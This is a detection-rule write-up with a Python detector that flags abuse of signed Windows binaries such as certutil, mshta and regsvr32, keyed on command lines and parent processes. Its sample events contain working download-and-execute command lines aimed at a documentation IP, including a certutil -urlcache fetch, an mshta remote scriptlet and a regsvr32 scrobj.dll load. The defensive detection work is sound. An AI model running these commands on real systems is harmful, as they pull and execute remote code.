Detects abuse of legitimate Windows binaries by tracking process creation, command-line parameters, and parent-child relationships to flag living-off-the-land and fileless attack patterns.
Monitor for suspicious use of legitimate, signed Windows binaries (LOLBins)
including certutil, mshta, rundll32, regsvr32, and others used in
fileless and living-off-the-land attack techniques. Because every one of
these binaries also has routine legitimate uses, the process name alone is
not a signal: the rule needs the full command line (for example certutil
-urlcache, regsvr32 /i: pointing at a URL, mshta or rundll32 given an
inline script) and the parent process (an Office application, PDF reader
or web server worker spawning a LOLBin). Both fields are present in Sysmon
Event ID 1; Security event 4688 carries the command line only when the
"Include command line in process creation events" policy is enabled.
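The detection logic described above, run over a handful of constructed process-creation events, as an added example that is not part of the original rule text. The binary list, argument patterns, parent-process list and sample events are all assumptions chosen to illustrate the approach; they are not a complete or authoritative signature set.

```python
import re
from collections import namedtuple

Alert = namedtuple("Alert", "rule image parent detail")

# LOLBins named in the rule plus a few common script hosts (the additions are assumptions).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "bitsadmin.exe"}

# Command-line fragments that are rarely seen in routine administration (illustrative, not exhaustive).
ARG_PATTERNS = {
    "certutil.exe":  re.compile(r"-urlcache|-decode\b|-encode\b|-verifyctl", re.I),
    "mshta.exe":     re.compile(r"https?:|javascript:|vbscript:", re.I),
    # rundll32 running inline script, or loading a DLL from a user-writable location
    "rundll32.exe":  re.compile(r"javascript:|\\(?:AppData|Temp|Users\\Public)\\", re.I),
    # regsvr32 pulling a scriptlet from a URL or via scrobj.dll
    "regsvr32.exe":  re.compile(r"/i:\S*https?:|scrobj\.dll|\.sct\b", re.I),
    "bitsadmin.exe": re.compile(r"/transfer|/addfile", re.I),
}

# Parents that have no business launching a LOLBin: Office, PDF reader, IIS worker (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "acrord32.exe", "w3wp.exe"}


def basename(path):
    """Lower-cased file name from a Windows path; tolerates forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Evaluate one process-creation event (Sysmon Event ID 1 style field names).

    Returns a list of Alert; an empty list means the event is not flagged.
    """
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    alerts = []
    if image not in LOLBINS:
        return alerts
    # Parent-child relationship: flagged regardless of arguments.
    if parent in SUSPICIOUS_PARENTS:
        alerts.append(Alert("lolbin_suspicious_parent", image, parent, cmd))
    # Argument patterns: flagged on the first matching fragment.
    pat = ARG_PATTERNS.get(image)
    if pat:
        m = pat.search(cmd)
        if m:
            alerts.append(Alert("lolbin_suspicious_args", image, parent, m.group(0)))
    return alerts


def scan(events):
    """Run evaluate() over a sequence of events and collect every alert."""
    out = []
    for e in events:
        out.extend(evaluate(e))
    return out


# Constructed sample events for the demonstration; not real telemetry. 198.51.100.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe javascript:a=GetObject("script:http://198.51.100.7/x.sct").Exec();close();',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://198.51.100.7/file.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",            # benign: Control Panel launch
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",            # benign: installer registering its own DLL
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule}: {a.image} (parent {a.parent}) -> {a.detail}")
```

The two benign events produce no alert because neither the parent nor the arguments match, which is the point of keying the rule on context rather than on the binary name; the mshta event fires twice, once for the Office parent and once for the inline script, and a real deployment would typically merge those into one higher-severity alert.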